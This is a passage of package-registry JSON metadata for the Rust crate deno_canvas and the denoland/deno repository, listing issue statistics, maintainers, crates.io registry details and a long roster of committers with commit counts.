argazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":53.75844619298076},"purl":"pkg:cargo/deno_canvas","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_canvas","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_canvas","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_canvas/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_canvas/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2024-01-25T03:30:29.347Z","updated_at":"2024-01-25T03:30:29.347Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2024-01-26T06:11:59.433Z","updated_at":"2024-01-26T06:11:59.433Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}}],"commits":{"id":21158,"full_name":"denoland/deno","default_branch":"main","total_commits":17284,"total_committers":1220,"total_bot_commits":29,"total_bot_committers":2,"mean_commits":14.167213114754098,"dds":0.8130641055311271,"past_year_total_commits":3108,"past_year_total_committers":199,"past_year_total_bot_commits":17,"past_year_total_bot_committers":2,"past_year_mean_commits":15.618090452261306,"past_year_dds":0.6415701415701416,"last_synced_at":"2026-09-08T12:26:47.416Z","last_synced_commit":"9ad36f7a2cce60488e6ec52283efb32efddaf93a","created_at":"2023-03-07T11:46:10.833Z","updated_at":"2026-09-08T12:26:46.913Z","committers":[{"name":"Bartek Iwańczuk","email":"biwanczuk@gmail.com","login":"bartlomieju","count":3231},{"name":"David Sherret","email":"dsherret","login":"dsherret","count":1806},{"name":"Ryan Dahl","email":"ry@tinyclouds.org","login":"ry","count":1431},{"name":"Divy Srivastava","email":"dj.srivastava23@gmail.com","login":"littledivy","count":852},{"name":"Nayeem Rahman","email":"nayeemrmn99@gmail.com","login":"nayeemrmn","count":628},{"name":"Luca Casonato","email":"hello@lcas.dev","login":"lucacasonato","count":521},{"name":"Nathan Whitaker","email":"17734409+nathanwhit","login":"nathanwhit","count":511},{"name":"Yoshiya Hinosawa","email":"stibium121@gmail.com","login":"kt3k","count":452},{"name":"em","email":"em@littledivy.com","login":"divybot","count":448},{"name":"Kitson Kelly","email":"me@kitsonkelly.com","login":"kitsonk","count":445},{"name":"Leo Kettmeir","email":"crowlkats@toaxl.com","login":"crowlKats","count":424},{"name":"Bert Belder","email":"bertbelder@gmail.com","login":"piscisaureus","count":422},{"name":"Casper Beyer","email":"caspervonb@pm.me","login":"caspervonb","count":321},{"name":"Matt Mastracci","email":"matthew@mastracci.com","login":"mmastrac","count":303},{"name":"Aaron O'Mullan","email":"aaron.omullan@gmail.com","login":"AaronO","count":225},{"name":"Asher Gomez","email":"ashersaupingomez@gmail.com","login":"iuioiua","count":220},{"name":"denobot","email":"33910674+denobot","login":"denobot","count":175},{"name":"Kevin (Kun) \"Kassimo\" Qian","email":"kevinkassimo@gmail.com","login":"kevinkassimo","count":167},{"name":"Marvin Hagemeister","email":"marvin@deno.com","login":"marvinhagemeister","count":154},{"name":"Marcos Casagrande","email":"marcoscvp90@gmail.com","login":"marcosc90","count":135},{"name":"Satya Rohith","email":"me@satyarohith.com","login":"satyarohith","count":121},{"name":"nathanwhitbot","email":"nathan+bot@deno.com","login":"nathanwhitbot","count":118},{"name":"Daniel Osvaldo Rahmanto","email":"daniel.rahmanto@gmail.com","login":"Tango992","count":113},{"name":"snek","email":"snek@deno.com","login":"devsnek","count":102},{"name":"Kenta Moriuchi","email":"moriken@kimamass.com","login":"petamoriken","count":101},{"name":"Yusuke Tanaka","email":"yusuktan@maguro.dev","login":"magurotuna","count":99},{"name":"迷渡","email":"justjavac@gmail.com","login":"justjavac","count":82},{"name":"Felipe Cardozo","email":"fraifelipe@gmail.com","login":"fraidev","count":77},{"name":"crowlbot","email":"280062030+crowlbot","login":"crowlbot","count":64},{"name":"Vincent LE GOFF","email":"g_n_s@hotmail.fr","login":"zekth","count":61},{"name":"Andreu Botella","email":"abb@randomunok.com","login":null,"count":59},{"name":"Chris Knight","email":"cknight1234@gmail.com","login":"cknight","count":58},{"name":"Axetroy","email":"troy450409405@gmail.com","login":"axetroy","count":56},{"name":"Aapo Alasuutari","email":"aapo.alasuutari@gmail.com","login":"aapoalas","count":56},{"name":"Geert-Jan Zwiers","email":"geertjanzwiers@protonmail.com","login":"GJZwiers","count":54},{"name":"Ben Noordhuis","email":"info@bnoordhuis.nl","login":"bnoordhuis","count":42},{"name":"Fibi","email":"278973722+fibibot","login":"fibibot","count":41},{"name":"Yusuke Sakurai","email":"kerokerokerop@gmail.com","login":"keroxp","count":40},{"name":"andy finch","email":"andyfinch7@gmail.com","login":"afinch7","count":40},{"name":"Andreu Botella","email":"andreu@andreubotella.com","login":"andreubotella","count":36},{"name":"uki00a","email":"uki00a@gmail.com","login":"uki00a","count":36},{"name":"Andy Hayden","email":"andyhayden1@gmail.com","login":"hayd","count":35},{"name":"木杉","email":"zhmushan@qq.com","login":"zhmushan","count":33},{"name":"Colin Ihrig","email":"cjihrig@gmail.com","login":"cjihrig","count":31},{"name":"Dmitry Sharshakov","email":"sh7dm@outlook.com","login":null,"count":30},{"name":"James Bronder","email":"36022278+jbronder","login":"jbronder","count":29},{"name":"JaePil Jung","email":"jjp5023@gmail.com","login":"J2P","count":28},{"name":"sigmaSd","email":"bedisnbiba@gmail.com","login":"sigmaSd","count":27},{"name":"Igor Zinkovsky","email":"igor@deno.com","login":null,"count":26},{"name":"dependabot[bot]","email":"49699333+dependabot[bot]","login":"dependabot[bot]","count":26},{"name":"Luna","email":"279187109+lunadogbot","login":"lunadogbot","count":26},{"name":"Ali Hasani","email":"a.hassssani@gmail.com","login":"disizali","count":25},{"name":"Kamil Ogórek","email":"kamil.ogorek@gmail.com","login":"kamilogorek","count":24},{"name":"Trivikram Kamat","email":"16024985+trivikr","login":"trivikr","count":24},{"name":"HasanAlrimawi","email":"141642411+HasanAlrimawi","login":"HasanAlrimawi","count":22},{"name":"ud2","email":"sjx233@qq.com","login":"0f-0b","count":22},{"name":"Heyang Zhou","email":"zhy20000919@hotmail.com","login":"losfair","count":22},{"name":"dubiousjim","email":"dubiousjim@gmail.com","login":"dubiousjim","count":21},{"name":"Ian Bull","email":"irbull@eclipsesource.com","login":"irbull","count":20},{"name":"Valentin Anger","email":"syrupthinker@gryphno.de","login":"SyrupThinker","count":20},{"name":"Liam Murphy","email":"43807659+Liamolucko","login":"Liamolucko","count":20},{"name":"tokiedokie","email":"thetokiedokie@gmail.com","login":"tokiedokie","count":20},{"name":"Steven Guerrero","email":"stephenguerrero43@gmail.com","login":"Soremwar","count":19},{"name":"Yasser A.Idrissi","email":"spookyframework@gmail.com","login":"getspooky","count":18},{"name":"ztplz","email":"mysticzt@gmail.com","login":"ztplz","count":18},{"name":"Jo Franchetti","email":"jofranchetti@gmail.com","login":"thisisjofrank","count":18},{"name":"Filip Skokan","email":"panva.ip@gmail.com","login":"panva","count":18},{"name":"Copilot","email":"198982749+Copilot","login":"Copilot","count":17},{"name":"Ikko Ashimine","email":"eltociear@gmail.com","login":"eltociear","count":16},{"name":"Gurwinder Singh","email":"vargwin@gmail.com","login":"95th","count":15},{"name":"Levente Kurusa","email":"lkurusa@kernelstuff.org","login":"levex","count":15},{"name":"Hajime-san","email":"41257923+Hajime-san","login":"Hajime-san","count":15},{"name":"Parsa Ghadimi","email":"me@qti3e.com","login":"qti3e","count":15},{"name":"Benjamin Gruenbaum","email":"benjamingr@gmail.com","login":"benjamingr","count":15},{"name":"Christian Moritz","email":"chrmoritz","login":"chrmoritz","count":14},{"name":"林炳权","email":"695601626@qq.com","login":"linbingquan","count":14},{"name":"William Perron","email":"hey@wperron.io","login":"wperron","count":14},{"name":"Pig Fang","email":"g-plane@hotmail.com","login":"g-plane","count":13},{"name":"Feng Yu","email":"f3n67u@gmail.com","login":"F3n67u","count":12},{"name":"Jesse Jackson","email":"jsejcksn","login":"jsejcksn","count":12},{"name":"Laurence Rowe","email":"l@lrowe.co.uk","login":"lrowe","count":12},{"name":"Mark Tiedemann","email":"www.marktiedemann@gmail.com","login":"MarkTiedemann","count":12},{"name":"Yiyu Lin","email":"linyiyu1992@gmail.com","login":"attila-lin","count":12},{"name":"DjDeveloper","email":"43033058+DjDeveloperr","login":"DjDeveloperr","count":11},{"name":"Simon Lecoq","email":"22963968+lowlighter","login":"lowlighter","count":11},{"name":"Kyle Kelley","email":"rgbkrk@gmail.com","login":"rgbkrk","count":11},{"name":"Carter Snook","email":"cartersnook04@gmail.com","login":"sno2","count":11},{"name":"EnokMan","email":"416828041@qq.com","login":"manyuanrong","count":10},{"name":"Volker Schlecht","email":"47375452+VlkrS","login":"VlkrS","count":10},{"name":"Sean Michael Wykes","email":"8363933+SeanWykes","login":"SeanWykes","count":10},{"name":"Mohammad Sulaiman","email":"mohammad.sulaiman@exalt.ps","login":"MohammadSu1","count":10},{"name":"Mathias Lafeldt","email":"mathias.lafeldt@gmail.com","login":"mlafeldt","count":10},{"name":"Mark Ladyshau","email":"47859603+mrkldshv","login":"mrkldshv","count":10},{"name":"Arnau Orriols","email":"4871949+arnauorriols","login":"arnauorriols","count":10},{"name":"João Souto","email":"joao.jpgs@hotmail.com","login":"jsouto18","count":10},{"name":"Tomofumi Chiba","email":"tomofumi.chiba@gmail.com","login":"chibat","count":9},{"name":"Tomas Zijdemans","email":"113360400+tomas-zijdemans","login":"tomas-zijdemans","count":9},{"name":"Nikolai Vavilov","email":"vvnicholas@gmail.com","login":"seishun","count":9},{"name":"Akshat Agarwal","email":"humancalico@disroot.org","login":"akshatagarwl","count":9},{"name":"Roj","email":"ez@roj.im","login":"rojvv","count":9},{"name":"kaju","email":"kaju@littledivy.com","login":"kajukitli","count":8},{"name":"await-ovo","email":"13152410380@163.com","login":"await-ovo","count":8},{"name":"Yosi Pramajaya","email":"yosi.pramajaya@gmail.com","login":"yos1p","count":8},{"name":"Yacine Hmito","email":"yacinehmito","login":"yacinehmito","count":8},{"name":"Tim Reichen","email":"timreichen","login":"timreichen","count":8},{"name":"Lino Le Van","email":"11367844+lino-levan","login":"lino-levan","count":8},{"name":"Kurt Mackey","email":"mrkurt@gmail.com","login":"mrkurt","count":8},{"name":"Andrew Mitchell","email":"32021055+mitch292","login":"mitch292","count":8},{"name":"scarf","email":"greenscarf005@gmail.com","login":"scarf005","count":8},{"name":"Inteon","email":"42113979+inteon","login":"inteon","count":8},{"name":"chirsz","email":"chirsz-ever@outlook.com","login":"chirsz-ever","count":7},{"name":"F001","email":"changchun.fan@qq.com","login":"F001","count":7},{"name":"Jean Pierre","email":"jeanp413@hotmail.com","login":"jeanp413","count":7},{"name":"Kayla Washburn","email":"mckayla@hey.com","login":"aslilac","count":7},{"name":"Lach","email":"iam@lach.pw","login":"CertainLach","count":7},{"name":"Sean McArthur","email":"sean@seanmonstar.com","login":"seanmonstar","count":7},{"name":"Szalay Kristóf","email":"32012862+littletof","login":"littletof","count":7},{"name":"Elias Sjögreen","email":"eliassjogreen1@gmail.com","login":"eliassjogreen","count":7},{"name":"Yazan AbdAl-Rahman","email":"yazan.abdalrahman@exalt.ps","login":"yazan-abdalrahman","count":7},{"name":"Zheyu Zhang","email":"zheyuzhang03@gmail.com","login":"ah-yu","count":7},{"name":"ayame113","email":"40050810+ayame113","login":"ayame113","count":7},{"name":"ctrl+d","email":"52456860+DanieleAurilio","login":"DanieleAurilio","count":7},{"name":"CGQAQ","email":"m.jason.liu@outlook.com","login":"CGQAQ","count":7},{"name":"ali ahmed","email":"48116123+AliBasicCoder","login":"AliBasicCoder","count":7},{"name":"Rob Waller","email":"rdwaller1984@gmail.com","login":"RobDWaller","count":7},{"name":"Behnam Mohammadi","email":"itten@live.com","login":"behnammodi","count":7},{"name":"Cre3per","email":"12541974+Cre3per","login":"Cre3per","count":7},{"name":"Benjamin Lupton","email":"b@lupton.cc","login":"balupton","count":7},{"name":"Michał Sabiniarz","email":"31597105+mhvsa","login":"mhvsa","count":6},{"name":"Matt Dumler","email":"mattd3v@pm.me","login":"mattd3v","count":6},{"name":"Mike Reinstein","email":"reinstein.mike@gmail.com","login":"mreinstein","count":6},{"name":"lif","email":"1835304752@qq.com","login":"majiayu000","count":6},{"name":"minato32","email":"77087663+minato32","login":"minato32","count":6},{"name":"Aaron Power","email":"theaaronepower@gmail.com","login":null,"count":6},{"name":"nasa","email":"htilcs1115@gmail.com","login":"k-nasa","count":6},{"name":"张超杰","email":"1098626505@qq.com","login":"dream2023","count":6},{"name":"KnorpelSenf","email":"shtrog@gmail.com","login":"KnorpelSenf","count":6},{"name":"Luke Channings","email":"461449+LukeChannings","login":"LukeChannings","count":6},{"name":"Anonymous","email":"65428781+00ff0000red","login":"00ff0000red","count":6},{"name":"bokuweb","email":"bokuweb","login":"bokuweb","count":6},{"name":"Felipe Baltor","email":"fbaltor@gmail.com","login":"fbaltor","count":6},{"name":"Jarrett Helton","email":"jaydhelton@gmail.com","login":"JayHelton","count":6},{"name":"Luca Bruno","email":"lucab@lucabruno.net","login":"lucab","count":6},{"name":"Maayan Hanin","email":"maayan.asa.hanin@gmail.com","login":"Spoonbender","count":6},{"name":"Maciej Wilk","email":"maciej.wilk@ringieraxelspringer.pl","login":"wilkmaciej","count":5},{"name":"Hirotaka Tagawa / wafuwafu13","email":"jaruwafu@gmail.com","login":"wafuwafu13","count":5},{"name":"Amol Yadav","email":"amyssnipet@yahoo.com","login":"amyssnippet","count":5},{"name":"Christian Dürr","email":"102963075+cd-work","login":"cd-work","count":5},{"name":"Craig Morten","email":"cmorten","login":"cmorten","count":5},{"name":"Eugen Cazacu","email":"32613393+oygen87","login":"oygen87","count":5},{"name":"Florian Schwalm","email":"68847951+egfx-notifications","login":"egfx-notifications","count":5},{"name":"Nugine","email":"nugine@foxmail.com","login":"Nugine","count":5},{"name":"李瑞丰","email":"liruifeng1024@gmail.com","login":"liruifengv","count":5},{"name":"Łukasz Czerniawski","email":"33061335+lczerniawski","login":"lczerniawski","count":5},{"name":"vwkd","email":"33468089+vwkd","login":"vwkd","count":5},{"name":"skdltmxn","email":"supershop@naver.com","login":"skdltmxn","count":5},{"name":"ryu","email":"114303361+ryuapp","login":"ryuapp","count":5},{"name":"evan","email":"github@evan.lol","login":"evanwashere","count":5},{"name":"ecyrbe","email":"ecyrbe@gmail.com","login":"ecyrbe","count":5},{"name":"Phil Hawksworth","email":"phil@deno.com","login":"philhawksworth","count":5},{"name":"Sebastien Filion","email":"sebastienfilion@mac.com","login":"sebastienfilion","count":5},{"name":"Trevor Manz","email":"trevor.j.manz@gmail.com","login":"manzt","count":5},{"name":"Ian Hickson","email":"ian@hixie.ch","login":"Hixie","count":5},{"name":"Jakub Łabor","email":"jacob.labor@gmail.com","login":"Suficio","count":5},{"name":"Robby Madruga","email":"robbymadruga@gmail.com","login":null,"count":5},{"name":"Jesper van den Ende","email":"jespertheend","login":"jespertheend","count":5},{"name":"KNnut","email":"9387720+KNnut","login":"KNnut","count":5},{"name":"Kaique da Silva","email":"44123854+ktfth","login":"ktfth","count":5},{"name":"Max Graey","email":"maxgraey@gmail.com","login":"MaxGraey","count":5},{"name":"chiefbiiko","email":"noah.anabiik.schwarz@gmail.com","login":"chiefbiiko","count":5},{"name":"Yorkie Liu","email":"yorkiefixer@gmail.com","login":"yorkie","count":5},{"name":"Waldir Pimenta","email":"waldyrious@gmail.com","login":"waldyrious","count":5},{"name":"Rafael Ávila de Espíndola","email":"espindola@chiselstrike.com","login":"espindola","count":5},{"name":"Marcus Weiner","email":"marcus.weiner@gmail.com","login":"mraerino","count":4},{"name":"Masashi Hirano","email":"shisama07@gmail.com","login":"shisama","count":4},{"name":"Max Drosdo.www","email":"g1ran1q@gmail.com","login":"ipriver","count":4},{"name":"Maxim Mazurok","email":"maxim@mazurok.com","login":"Maxim-Mazurok","count":4},{"name":"Maxim Zhukov","email":"maxim.zhukov.dev@gmail.com","login":"FSou1","count":4},{"name":"Mo","email":"modisemorebodi@gmail.com","login":"mrmodise","count":4},{"name":"MujahedSafaa","email":"168719085+MujahedSafaa","login":"MujahedSafaa","count":4},{"name":"Efe","email":"dogukankrskl@gmail.com","login":"efekrskl","count":4},{"name":"Edilson Pateguana","email":"dev.258.edilson@gmail.com","login":"edilson258","count":4},{"name":"Daniil Sivak","email":"seroperson@gmail.com","login":"seroperson","count":4},{"name":"Benjamin Swerdlow","email":"Swerdlowbenjamin@gmail.com","login":"theswerd","count":4},{"name":"Jakub Jirutka","email":"jakub@jirutka.cz","login":"jirutka","count":4},{"name":"James Garbutt","email":"43081j","login":"43081j","count":4},{"name":"Jinho Bang","email":"zino@chromium.org","login":"romandev","count":4},{"name":"Jovi De Croock","email":"decroockjovi@gmail.com","login":"JoviDeCroock","count":4},{"name":"Khải","email":"hvksmr1996@gmail.com","login":"KSXGitHub","count":4},{"name":"Nick Stott","email":"nick@nickstott.com","login":"nstott","count":4},{"name":"Sylvain Cau","email":"sylvaincau31@gmail.com","login":"sylc","count":4},{"name":"Tomohito Nakayama","email":"nkym.tmht@gmail.com","login":"7k8m","count":4},{"name":"Cyan","email":"contact@cyans.me","login":"CyanChanges","count":4},{"name":"Mike Mulchrone","email":"mtmulch0191@outlook.com","login":"WingZer0o","count":4},{"name":"Andrey Trebler","email":"at@edrilling.no","login":"trebler","count":4},{"name":"Ondřej Žára","email":"ondrej.zara@gmail.com","login":"ondras","count":4},{"name":"grian","email":"54550982+grian32","login":"grian32","count":4},{"name":"hashrock","email":"hashrock","login":"hashrock","count":4},{"name":"timonson","email":"54777088+timonson","login":"timonson","count":4},{"name":"zfx","email":"502545703@qq.com","login":"fuxingZhang","count":4},{"name":"Dmitry Sharshakov","email":"d3dx12.xx@gmail.com","login":"dsseng","count":4},{"name":"Kyra","email":"kyradiscord@gmail.com","login":"kyranet","count":4},{"name":"Li Hao","email":"hao.x.li@intel.com","login":"haoxli","count":4},{"name":"Dezső Mészáros","email":"meszarosdezsodev@gmail.com","login":"meszarosdezso","count":4},{"name":"Mani Maghsoudlou","email":"manidlou@gmail.com","login":"manidlou","count":4},{"name":"Rano | Ranadeep","email":"mail@rnbguy.at","login":"rnbguy","count":4},{"name":"Zach","email":"zachauten@gmail.com","login":"zachauten","count":4},{"name":"Garcia","email":"phosra@tutanota.com","login":null,"count":4},{"name":"Yueqian Yang","email":"yueqian8@illinois.edu","login":"yyq1025","count":4},{"name":"Yingbo (Max) Wang","email":"maxwyb@gmail.com","login":"maxwyb","count":4},{"name":"VishnuJin","email":"45007338+VishnuJin","login":"VishnuJin","count":4},{"name":"Simon Rask","email":"33556894+SimonRask","login":"SimonRask","count":4},{"name":"Schwarzkopf Balázs","email":"schwarzkopfb@icloud.com","login":"schwarzkopfb","count":4},{"name":"Raika Toriyama","email":"pvcresin","login":"pvcresin","count":4},{"name":"Jérôme Benoit","email":"jerome.benoit@piment-noir.org","login":"jerome-benoit","count":4},{"name":"Jens Krause","email":"email@jkrause.io","login":"sectore","count":4},{"name":"Peter Evers","email":"pevers90@gmail.com","login":"pevers","count":4},{"name":"Jake Champion","email":"me@jakechampion.name","login":"JakeChampion","count":4},{"name":"Raashid Anwar","email":"raashid12anwar@gmail.com","login":"raashidanwar","count":4},{"name":"Kang Huaishuai","email":"khs1994@khs1994.com","login":"khs1994","count":3},{"name":"Joseph","email":"jngugi88@gmail.com","login":"Kachulio1","count":3},{"name":"Jonathon Orsi","email":"jonathon.orsi@gmail.com","login":"orsi","count":3},{"name":"Kevin Whinnery","email":"kevin.whinnery@gmail.com","login":"kwhinnery","count":3},{"name":"Kid","email":"44045911+kidonng","login":"kidonng","count":3},{"name":"Kingsword","email":"kingsword09@gmail.com","login":"kingsword09","count":3},{"name":"Kunj Rathod","email":"86590228+rathodkunj2005","login":"rathodkunj2005","count":3},{"name":"Liam Perlaki","email":"lperlaki@icloud.com","login":"lperlaki","count":3},{"name":"MOHAMED IDAGHDOUR","email":"midaghdour@gmail.com","login":"Medo-ID","count":3},{"name":"Martin Fischer","email":"martin@push-f.com","login":"not-my-profile","count":3},{"name":"Nik B","email":"nikicat","login":"nikicat","count":3},{"name":"Oliver Lenehan","email":"sunsetkookaburra+git@outlook.com.au","login":"sunsetkookaburra","count":3},{"name":"Alex Yang","email":"himself65@outlook.com","login":"himself65","count":3},{"name":"gitstart-app[bot]","email":"57568882+gitstart-app[bot]","login":"gitstart-app[bot]","count":3},{"name":"chainhelen","email":"chainhelen@gmail.com","login":"chainhelen","count":3},{"name":"bartOssh","email":"lenart.consulting@gmail.com","login":"bartossh","count":3},{"name":"badgerbees","email":"93577481+badgerbees","login":"badgerbees","count":3},{"name":"akfm","email":"akfm.sato@gmail.com","login":"AkifumiSato","count":3},{"name":"Yarden Shoham","email":"git@yardenshoham.com","login":"yardenshoham","count":3},{"name":"Xin Du (Clark)","email":"clark.duxin@gmail.com","login":"clarkdo","count":3},{"name":"Vedant Pandey","email":"vedantpandey46@gmail.com","login":"vedant-pandey","count":3},{"name":"Peter Indiola","email":"pindiola@gmail.com","login":"chocnut","count":3},{"name":"Jed Fox","email":"git@twopointzero.us","login":"j-f1","count":3},{"name":"ULIVZ","email":"472590061@qq.com","login":"ulivz","count":3},{"name":"Tuan Le","email":"23419763+tumile","login":"tumile","count":3},{"name":"TrickyPi","email":"33021497+TrickyPi","login":"TrickyPi","count":3},{"name":"Stanislav","email":"62983943+stanislavstrelnikov","login":"stanislavstrelnikov","count":3},{"name":"Sergey Golovin","email":"golovim@gmail.com","login":"daynin","count":3},{"name":"Sajjad Hashemian","email":"wolaws@gmail.com","login":"sijad","count":3},{"name":"Ryan Clements","email":"ryanclementshax@gmail.com","login":"RyanClementsHax","count":3},{"name":"Ross Weir","email":"29697678+ross-weir","login":"ross-weir","count":3},{"name":"Richard Carson","email":"Rscarson@rogers.com","login":"rscarson","count":3},{"name":"muddlebee","email":"anweshknayak@gmail.com","login":"muddlebee","count":3},{"name":"binaryta","email":"naritatakuya0000@gmail.com","login":"binaryta","count":3},{"name":"Rich Trott","email":"rtrott@gmail.com","login":"Trott","count":3},{"name":"JasperVanEsveld","email":"9715316+JasperVanEsveld","login":"JasperVanEsveld","count":3},{"name":"cions","email":"gh.cions@gmail.com","login":"cions","count":3},{"name":"Rohan Santhosh","email":"rohan.santhoshkumar@gmail.com","login":"Rohan5commit","count":3},{"name":"Nicholas Berlette","email":"nick@berlette.com","login":"nberlette","count":3},{"name":"Max","email":"max.csantos@live.com","login":"maxxcs","count":3},{"name":"Matt Harrison","email":"hi@matt-harrison.com","login":"mtharrison","count":3},{"name":"Jacob Gee-Clarke","email":"jacob@jacobgc.me","login":"jacobgc","count":3},{"name":"Ben 